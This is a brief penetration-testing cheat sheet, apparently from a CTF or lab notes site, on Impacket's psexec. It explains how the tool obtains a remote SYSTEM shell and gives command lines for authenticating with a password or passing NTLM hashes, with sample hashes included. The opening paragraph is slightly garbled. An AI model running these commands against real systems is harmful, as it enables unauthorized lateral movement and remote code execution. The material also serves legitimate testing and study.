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Impacket PsExec

The PSExec service then creates a named pipe that can send commands to the system. is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.


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Basic commands

# Get help 
impacket-psexec -h

# Connect to a remote machine with a local administrator account
impacket-psexec administrator:'<password>'@$ip

# Connect to a remote machine with a local administrator account $domain/$user:$password@$ip 

# Connect to a machine passing the hash
impacket-psexec $domain/$user@$ip -hashes $LM-authentication:$NTLM
# Example:
# impacket-psexec egotistical-bank.local/administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

# If we only have the NTLM, then we can leave the $LM part in blank. Example:
impacket-psexec Administrator@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453
Last update: 2025-01-18
Created: November 28, 2023 21:35:42